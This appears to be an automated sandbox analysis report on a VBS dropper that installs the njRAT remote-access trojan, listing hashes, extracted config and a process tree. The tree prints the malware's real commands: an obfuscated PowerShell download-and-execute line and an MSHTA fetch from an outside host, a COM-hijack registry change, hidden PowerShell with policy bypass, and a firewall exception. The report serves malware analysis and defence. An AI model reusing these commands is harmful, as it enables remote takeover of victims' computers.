Analysis
-
max time kernel
145s
-
max time network
150s
-
platform
windows10-2004_x64
-
resource
win10v2004-20220721-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20220721-en locale:en-us os:windows10-2004-x64 system
-
submitted
09-08-2022 19:01
Static task
static1
Behavioral task
behavioral1
Sample
ZURLRYOHRJILYWHHLBXSQO.vbs
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
ZURLRYOHRJILYWHHLBXSQO.vbs
Resource
win10v2004-20220721-en
General
-
Target
ZURLRYOHRJILYWHHLBXSQO.vbs
-
Size
1KB
-
MD5
5f15ed0b10945b58f1d89fd89e7816a2
-
SHA1
0912be608b29f1bb905f9758e5b791f43531fc3b
-
SHA256
b529175e6e3cd7badb222d3a863d034241489835759f9557d8e8aae52e562706
-
SHA512
3e92fc68eb3de3dd8373842c8f4566323299803425ff8a80764f40f762a0680b5d30aeabb9f7a3efb189ebd3c0594ca7c4292a3e26836955db81ad260a144cae
Malware Config
Extracted
https://tradeguru.com.pk/enc3.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: MSHTA.EXE, POWERSHELL.exe, POWERSHELL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3404 | 2292 | MSHTA.EXE |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1156 | 2292 | POWERSHELL.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3396 | 2292 | POWERSHELL.exe |
-
Blocklisted process makes network request 3 IoCs
Processes: MSHTA.EXE, POWERSHELL.exe
flow | pid | process
8 | 3404 | MSHTA.EXE
13 | 3404 | MSHTA.EXE
15 | 1156 | POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 3588 set thread context of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes: reg.exe, reg.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid | process
1156 | POWERSHELL.exe
1156 | POWERSHELL.exe
4936 | powershell.exe
4936 | powershell.exe
3396 | POWERSHELL.exe
3396 | POWERSHELL.exe
3588 | powershell.exe
3588 | powershell.exe
3588 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description | pid | process | target process
PID 1156 wrote to memory of 4936 | 1156 | POWERSHELL.exe | powershell.exe
PID 1156 wrote to memory of 4936 | 1156 | POWERSHELL.exe | powershell.exe
PID 4936 wrote to memory of 5056 | 4936 | powershell.exe | WScript.exe
PID 4936 wrote to memory of 5056 | 4936 | powershell.exe | WScript.exe
PID 3396 wrote to memory of 1160 | 3396 | POWERSHELL.exe | cmd.exe
PID 3396 wrote to memory of 1160 | 3396 | POWERSHELL.exe | cmd.exe
PID 1160 wrote to memory of 1216 | 1160 | cmd.exe | reg.exe
PID 1160 wrote to memory of 1216 | 1160 | cmd.exe | reg.exe
PID 1160 wrote to memory of 1284 | 1160 | cmd.exe | reg.exe
PID 1160 wrote to memory of 1284 | 1160 | cmd.exe | reg.exe
PID 1160 wrote to memory of 4980 | 1160 | cmd.exe | cmd.exe
PID 1160 wrote to memory of 4980 | 1160 | cmd.exe | cmd.exe
PID 4980 wrote to memory of 3588 | 4980 | cmd.exe | powershell.exe
PID 4980 wrote to memory of 3588 | 4980 | cmd.exe | powershell.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 3588 wrote to memory of 4468 | 3588 | powershell.exe | aspnet_compiler.exe
PID 4468 wrote to memory of 2748 | 4468 | aspnet_compiler.exe | netsh.exe
PID 4468 wrote to memory of 2748 | 4468 | aspnet_compiler.exe | netsh.exe
PID 4468 wrote to memory of 2748 | 4468 | aspnet_compiler.exe | netsh.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZURLRYOHRJILYWHHLBXSQO.vbs"
1⤵
-
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc3.txt
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@76@m.N_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 
'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"
3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""
2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
6⤵
- Modifies Windows Firewall
Downloads
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1
Filesize
604KB
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
Filesize
706B
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1
Filesize
3KB
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B